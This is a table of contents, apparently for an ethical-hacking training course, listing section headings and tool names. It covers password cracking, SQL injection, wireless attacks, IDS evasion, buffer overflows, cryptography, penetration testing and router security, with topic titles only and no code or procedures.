Hotfi xes and Patches
What is Patch Management
Patch Management Checklist
o Solution: UpdateExpert
o Patch Management Tool: qfecheck
o Patch Management Tool: HFNetChk
o cacls.exe utility
o Shavlik NetChk Protect
o Kaseya Patch Management
o IBM Tivoli Confi guration Manager
o LANDesk Patch Manager
o BMC Patch Manager
o Confi gureSoft Enterprise Confi guration Manager (ECM)
o BladeLogic Confi guration Manager
o Opsware Server Automation System (SAS)
o Best Practices for Patch Management
Vulnerability Scanners
Online Vulnerability Search Engine
Network Tool: Whisker
Network Tool: N-Stealth HTTP Vulnerability Scanner
Hacking Tool: WebInspect
Network Tool: Shadow Security Scanner
Secure IIS
o ServersCheck Monitoring
o GFI Network Server Monitor
o Servers Alive
o Webserver Stress Tool

Web-Based Password Cracking Techniques

Authentication - Defi nition
Authentication Mechanisms
o HTTP Authentication
• Basic Authentication
• Digest Authentication
o Integrated Windows (NTLM) Authentication
o Negotiate Authentication
o Certifi cate-based Authentication
o Forms-based Authentication
o RSA SecurID Token
o Biometrics Authentication
• Types of Biometrics Authentication
Fingerprint-based Identifi cation
Hand Geometry- based Identifi cation
Retina Scanning
Face Recognition
Face Code: WebCam Based Biometrics Authentication System
Bill Gates at the RSA Conference 2006
How to Select a Good Password
Things to Avoid in Passwords
Changing Your Password
Protecting Your Password
Examples of Bad Passwords
The “Mary Had A Little Lamb” Formula
How Hackers Get Hold of Passwords
Windows XP: Remove Saved Passwords
What is a Password Cracker
Modus Operandi of an Attacker Using a Password Cracker
How Does a Password Cracker Work
Attacks - Classifi cation
o Password Guessing
o Query String
o Cookies
o Dictionary Maker
Password Crackers Available
o L0phtCrack (LC4)
o John the Ripper
o Brutus
o ObiWaN
o Authforce
o Hydra
o Cain & Abel
o RAR
o Gammaprog
o WebCracker
o Munga Bunga
o PassList
o SnadBoy
o MessenPass
o Wireless WEP Key Password Spy
o RockXP
o Password Spectator Pro
o Passwordstate
o Atomic Mailbox Password Cracker
o Advanced Mailbox Password Recovery (AMBPR)
o Tool: Network Password Recovery
o Tool: Mail PassView
o Tool: Messenger Key
o Tool: SniffPass
o WebPassword
o Password Administrator
o Password Safe
o Easy Web Password
o PassReminder
o My Password Manager

SQL Injection

What is SQL Injection
Exploiting Web Applications
Steps for performing SQL injection
What You Should Look For
What If It Doesn’t Take Input
OLE DB Errors
Input Validation Attack
SQL injection Techniques
How to Test for SQL Injection Vulnerability
How Does It Work
BadLogin.aspx.cs
BadProductList.aspx.cs
Executing Operating System Commands
Getting Output of SQL Query
Getting Data from the Database Using ODBC Error Message
How to Mine all Column Names of a Table
How to Retrieve any Data
How to Update/Insert Data into Database
SQL Injection in Oracle
SQL Injection in MySql Database
Attacking Against SQL Servers
SQL Server Resolution Service (SSRS)
Osql -L Probing
SQL Injection Automated Tools
Automated SQL Injection Tool: AutoMagic SQL
Absinthe Automated SQL Injection Tool
o Hacking Tool: SQLDict
o Hacking Tool: SQLExec
o SQL Server Password Auditing Tool: sqlbf
o Hacking Tool: SQLSmack
o Hacking Tool: SQL2.exe
o sqlmap
o sqlninja
o SQLIer
o Automagic SQL Injector
Blind SQL Injection
o Blind SQL Injection: Countermeasure
o Blind SQL Injection Schema
SQL Injection Countermeasures
Preventing SQL Injection Attacks
GoodLogin.aspx.cs
SQL Injection Blocking Tool: SQL Block
Acunetix Web Vulnerability Scanner

Hacking Wireless Networks

Introduction to Wireless
o Introduction to Wireless Networking
o Wired Network vs. Wireless Network
o Effects of Wireless Attacks on Business
o Types of Wireless Network
o Advantages and Disadvantages of a Wireless Network
Wireless Standards
o Wireless Standard: 802.11a
o Wireless Standard: 802.11b – “WiFi”
o Wireless Standard: 802.11g
o Wireless Standard: 802.11i
o Wireless Standard: 802.11n
Wireless Concepts and Devices
o Related Technology and Carrier Networks
o Antennas
o Wireless Access Points
o SSID
o Beacon Frames
o Is the SSID a Secret
o Setting up a WLAN
o Authentication and Association
o Authentication Modes
o The 802.1X Authentication Process
WEP and WPA
o Wired Equivalent Privacy (WEP)
o WEP Issues
o WEP - Authentication Phase
o WEP - Shared Key Authentication
o WEP - Association Phase
o WEP Flaws
o What is WPA
o WPA Vulnerabilities
o WEP, WPA, and WPA2
o WPA2 Wi-Fi Protected Access 2
Attacks and Hacking Tools
o Terminologies
o WarChalking
o Authentication and (Dis) Association Attacks
o WEP Attack
o Cracking WEP
o Weak Keys (a.k.a. Weak IVs)
o Problems with WEP’s Key Stream and Reuse
o Automated WEP Crackers
o Pad-Collection Attacks
o XOR Encryption
o Stream Cipher
o WEP Tool: Aircrack
o Aircrack-ng
o WEP Tool: AirSnort
o WEP Tool: WEPCrack
o WEP Tool: WepLab
o Attacking WPA Encrypted Networks
o Attacking WEP with WEPCrack on Windows using Cygwin
o Attacking WEP with WEPCrack on Windows using PERL Interpreter
o Tool: Wepdecrypt
o WPA-PSK Cracking Tool: CowPatty
o 802.11 Specifi c Vulnerabilities
o Evil Twin: Attack
o Rogue Access Points
o Tools to Generate Rogue Access Points: Fake AP
o Tools to Detect Rogue Access Points: Netstumbler
o Tools to Detect Rogue Access Points: MiniStumbler
o ClassicStumbler
o AirFart
o AP Radar
o Hotspotter
o Cloaked Access Point
o WarDriving Tool: shtumble
o Temporal Key Integrity Protocol (TKIP)
o LEAP: The Lightweight Extensible Authentication Protocol
o LEAP Attacks
o LEAP Attack Tool: ASLEAP
o Working of ASLEAP
o MAC Sniffi ng and AP Spoofi ng
o Defeating MAC Address Filtering in Windows
o Manually Changing the MAC Address in Windows XP and 2000
o Tool to Detect MAC Address Spoofi ng: Wellenreiter
o Man-in-the-Middle Attack (MITM)
o Denial-of-Service Attacks
o DoS Attack Tool: Fatajack
o Hijacking and Modifying a Wireless Network
o Phone Jammers
o Phone Jammer: Mobile Blocker
o Pocket Cellular Style Cell Phone Jammer
o 2.4Ghz Wi-Fi & Wireless Camera Jammer
o 3 Watt Digital Cell Phone Jammer
o 3 Watt Quad Band Digital Cellular Mobile Phone Jammer
o 20W Quad Band Digital Cellular Mobile Phone Jammer
o 40W Digital Cellular Mobile Phone Jammer
o Detecting a Wireless Network
Scanning Tools
o Scanning Tool: Kismet
o Scanning Tool: Prismstumbler
o Scanning Tool: MacStumbler
o Scanning Tool: Mognet V1.16
o Scanning Tool: WaveStumbler
o Scanning Tool: Netchaser V1.0 for Palm Tops
o Scanning Tool: AP Scanner
o Scanning Tool: Wavemon
o Scanning Tool: Wireless Security Auditor (WSA)
o Scanning Tool: AirTraf
o Scanning Tool: WiFi Finder
o Scanning Tool: Wifi Scanner
o eEye Retina WiFI
o Simple Wireless Scanner
o wlanScanner
Sniffi ng Tools
o Sniffi ng Tool: AiroPeek
o Sniffi ng Tool: NAI Wireless Sniffer
o MAC Sniffi ng Tool: WireShark
o Sniffi ng Tool: vxSniffer
o Sniffi ng Tool: Etherpeg
o Sniffi ng Tool: Drifnet
o Sniffi ng Tool: AirMagnet
o Sniffi ng Tool: WinDump
o Sniffi ng Tool: Ssidsniff
o Multiuse Tool: THC-RUT
o Tool: WinPcap
o Tool: AirPcap
o AirPcap: Example Program from the Developer’s Pack
Hacking Wireless Networks
o Steps for Hacking Wireless Networks
o Step 1: Find Networks to Attack
o Step 2: Choose the Network to Attack
o Step 3: Analyzing the Network
o Step 4: Cracking the WEP Key
o Step 5: Sniffi ng the Network
Wireless Security
o WIDZ: Wireless Intrusion Detection System
o Radius: Used as Additional Layer in Security
o Securing Wireless Networks
o Wireless Network Security Checklist
o WLAN Security: Passphrase
o Don’ts in Wireless Security
Wireless Security Tools
o WLAN Diagnostic Tool: CommView for WiFi PPC
o WLAN Diagnostic Tool: AirMagnet Handheld Analyzer

Linux Hacking

Why Linux
Linux Distributions
Linux Live CD-ROMs
Basic Commands of Linux: Files & Directories
Linux Basic
o Linux File Structure
o Linux Networking Commands
Directories in Linux
Installing, Confi guring, and Compiling Linux Kernel
How to Install a Kernel Patch
Compiling Programs in Linux
GCC Commands
Make Files
Make Install Command
Linux Vulnerabilities
Chrooting
Why is Linux Hacked
How to Apply Patches to Vulnerable Programs
Scanning Networks
Nmap in Linux
Scanning Tool: Nessus
Port Scan Detection Tools
Password Cracking in Linux: Xcrack
Firewall in Linux: IPTables
IPTables Command
Basic Linux Operating System Defense
SARA (Security Auditor's Research Assistant)
Linux Tool: Netcat
Linux Tool: tcpdump
Linux Tool: Snort
Linux Tool: SAINT
Linux Tool: Wireshark
Linux Tool: Abacus Port Sentry
Linux Tool: DSniff Collection
Linux Tool: Hping2
Linux Tool: Sniffi t
Linux Tool: Nemesis
Linux Tool: LSOF
Linux Tool: IPTraf
Linux Tool: LIDS
Hacking Tool: Hunt
Tool: TCP Wrappers
Linux Loadable Kernel Modules
Hacking Tool: Linux Rootkits
Rootkits: Knark & Torn
Rootkits: Tuxit, Adore, Ramen
Rootkit: Beastkit
Rootkit Countermeasures
‘chkrootkit’ detects the following Rootkits

Evading IDS, Firewalls and Detecting Honey Pots

Introduction to Intrusion Detection System
Terminologies
Intrusion Detection System (IDS)
o IDS Placement
o Ways to Detect an Intrusion
o Types of Instruction Detection Systems
o System Integrity Verifi ers (SIVS)
o Tripwire
o Cisco Security Agent (CSA)
o True/False, Positive/Negative
o Signature Analysis
o General Indication of Intrusion: System Indications
o General Indication of Intrusion: File System Indications
o General Indication of Intrusion: Network Indications
o Intrusion Detection Tools
• Snort
• Running Snort on Windows 2003
• Snort Console
• Testing Snort
• Confi guring Snort (snort.conf )
• Snort Rules
• Set up Snort to Log to the Event Logs and to Run as a Service
• Using EventTriggers.exe for Eventlog Notifi cations
• SnortSam
o Steps to Perform after an IDS detects an attack
o Evading IDS Systems
• Ways to Evade IDS
• Tools to Evade IDS
IDS Evading Tool: ADMutate
Packet Generators
What is a Firewall?
o What Does a Firewall Do
o Packet Filtering
o What can’t a fi rewall do
o How does a Firewall work
o Firewall Operations
o Hardware Firewall
o Software Firewall
o Types of Firewall
• Packet Filtering Firewall
• IP Packet Filtering Firewall
• Circuit-Level Gateway
• TCP Packet Filtering Firewall
• Application Level Firewall
• Application Packet Filtering Firewall
• Stateful Multilayer Inspection Firewall
o Packet Filtering Firewall
o Firewall Identifi cation
o Firewalking
o Banner Grabbing
o Breaching Firewalls
o Bypassing a Firewall using HTTPTunnel
o Placing Backdoors through Firewalls
o Hiding Behind a Covert Channel: LOKI
o Tool: NCovert
o ACK Tunneling

Common Tool for Testing Firewall and IDS
o IDS testing tool: IDS Informer
o IDS Testing Tool: Evasion Gateway
o IDS Tool: Event Monitoring Enabling Responses to Anomalous Live Disturbances (Emerald)
o IDS Tool: BlackICE
o IDS Tool: Next-Generation Intrusion Detection Expert System (NIDES)
o IDS Tool: SecureHost
o IDS Tool: Snare
o IDS Testing Tool: Traffi c IQ Professional
o IDS Testing Tool: TCPOpera
o IDS testing tool: Firewall Informer
o Atelier Web Firewall Tester
What is Honeypot?
o The Honeynet Project
o Types of Honeypots
Low-interaction honeypot
Medium-interaction honeypot
High-interaction honeypot
o Advantages and Disadvantages of a Honeypot
o Where to place Honeypots
o Honeypots
• Honeypot-SPECTER
• Honeypot - honeyd
• Honeypot – KFSensor
• Sebek
o Physical and Virtual Honeypots
Tools to Detect Honeypots
What to do when hacked

Buffer Overflows

Why are Programs/Applications Vulnerable
Buffer Overfl ows
Reasons for Buffer Overfl ow Attacks
Knowledge Required to Program Buffer Overfl ow Exploits
Understanding Stacks
Understanding Heaps
Types of Buffer Overfl ows: Stack-based Buffer Overfl ow
o A Simple Uncontrolled Overfl ow of the Stack
o Stack Based Buffer Overfl ows
Types of Buffer Overfl ows: Heap-based Buffer Overfl ow
o Heap Memory Buffer Overfl ow Bug
o Heap-based Buffer Overfl ow
Understanding Assembly Language
o Shellcode
How to Detect Buffer Overfl ows in a Program
o Attacking a Real Program
NOPs
How to Mutate a Buffer Overfl ow Exploit
Once the Stack is Smashed
Defense Against Buffer Overfl ows
o Tool to Defend Buffer Overfl ow: Return Address Defender (RAD)
o Tool to Defend Buffer Overfl ow: StackGuard
o Tool to Defend Buffer Overfl ow: Immunix System
o Vulnerability Search: NIST
o Valgrind
o Insure++
Buffer Overfl ow Protection Solution: Libsafe
o Comparing Functions of libc and Libsafe
Simple Buffer Overfl ow in C
o Code Analysis

Cryptography

Introduction to Cryptography
Classical Cryptographic Techniques
o Encryption
o Decryption
Cryptographic Algorithms
RSA (Rivest Shamir Adleman)
o Example of RSA Algorithm
o RSA Attacks
o RSA Challenge
Data Encryption Standard (DES)
o DES Overview
RC4, RC5, RC6, Blowfi sh
o RC5
Message Digest Functions
o One-way Bash Functions
o MD5
SHA (Secure Hash Algorithm)
SSL (Secure Sockets Layer)
What is SSH?
o SSH (Secure Shell)
Algorithms and Security
Disk Encryption
Government Access to Keys (GAK)
Digital Signature
o Components of a Digital Signature
o Method of Digital Signature Technology
o Digital Signature Applications
o Digital Signature Standard
o Digital Signature Algorithm: Signature Generation/Verifi cation
o Digital Signature Algorithms: ECDSA, ElGamal Signature Scheme
o Challenges and Opportunities
Digital Certifi cates
CypherCalc
Command Line Scriptor
CryptoHeaven
Hacking Tool: PGP Crack
Magic Lantern
Advanced File Encryptor
Encryption Engine
Encrypt Files
Encrypt PDF
Encrypt Easy
Encrypt my Folder
Advanced HTML Encrypt and Password Protect
Encrypt HTML source
Alive File Encryption
Omziff
ABC CHAOS
EncryptOnClick
CryptoForge
SafeCryptor
CrypTool
Microsoft Cryptography Tools
Polar Crypto Light
CryptoSafe
Crypt Edit
CrypSecure
Cryptlib
Crypto++ Library
Code Breaking: Methodologies
Cryptanalysis
Cryptography Attacks
Brute-Force Attack

Penetration Testing

Introduction to Penetration Testing (PT)
Vulnerability Assessment
Limitations of Vulnerability Assessment
Penetration Testing
Types of Penetration Testing
Risk Management
Do-It-Yourself Testing
Outsourcing Penetration Testing Services
Terms of Engagement
Project Scope
Pentest Service Level Agreements
Testing points
Testing Locations
Automated Testing
Manual Testing
Using DNS Domain Name and IP Address Information
Enumerating Information about Hosts on Publicly Available Networks
Testing Network-fi ltering Devices
Enumerating Devices
Denial-of-Service Emulation
Pentest using Appscan
HackerShield
Pen-Test Using Cerberus Internet Scanner
Pen-Test Using Cybercop Scanner
Pen-Test Using FoundScan Hardware Appliances
Pen-Test Using Nessus
Pen-Test Using NetRecon
Pen-Test Using SAINT
Pen-Test Using SecureNet Pro
Pen-Test Using SecureScan
Pen-Test Using SATAN, SARA and Security Analyzer
Pen-Test Using STAT Analyzer
Pentest Using VigilENT
Pentest Using WebInspect
Pentest Using CredDigger
Pentest Using Nsauditor
Evaluating Different Types of Pen-Test Tools
Asset Audit
Fault Tree and Attack Trees
Business Impact of Threat
Internal Metrics Threat
External Metrics Threat
Calculating Relative Criticality
Test Dependencies
Defect Tracking Tools: Bug Tracker Server
Disk Replication Tools
DNS Zone Transfer Testing Tools
Network Auditing Tools
Trace Route Tools and Services
Network Sniffi ng Tools
Denial of Service Emulation Tools
Traditional Load Testing Tools
System Software Assessment Tools
Operating System Protection Tools
Fingerprinting Tools
Port Scanning Tools
Directory and File Access Control Tools
File Share Scanning Tools
Password Directories
Password Guessing Tools
Link Checking Tools
Web-Testing Based Scripting tools
Buffer Overfl ow protection Tools
File Encryption Tools
Database Assessment Tools
Keyboard Logging and Screen Reordering Tools
System Event Logging and Reviewing Tools

Hacking Routers, cable Modems and Firewalls

Network Devices
Identifying a Router
o SING: Tool for Identifying the Router
HTTP Confi guration Arbitrary Administrative Access Vulnerability
ADMsnmp
Solarwinds MIB Browser
Brute-Forcing Login Services
Hydra
Analyzing the Router Confi g
Cracking the Enable Password
Tool: Cain and Abel
Implications of a Router Attack
Types of Router Attacks
Router Attack Topology
Denial of Service (DoS) Attacks
Packet “Mistreating” Attacks
Routing Table Poisoning
Hit-and-run Attacks vs. Persistent Attacks
Cisco Router
o Finding a Cisco Router
o How to Get into Cisco Router
o Breaking the Password
o Is Anyone Here
o Covering Tracks
o Looking Around
Eigrp-tool
Tool: Zebra
Tool: Yersinia for HSRP, CDP, and other layer 2 attacks
Tool: Cisco Torch
Monitoring SMTP(port25) Using SLcheck
Monitoring HTTP(port 80)
Cable Modem Hacking

Venkat Hacking Articles

VHA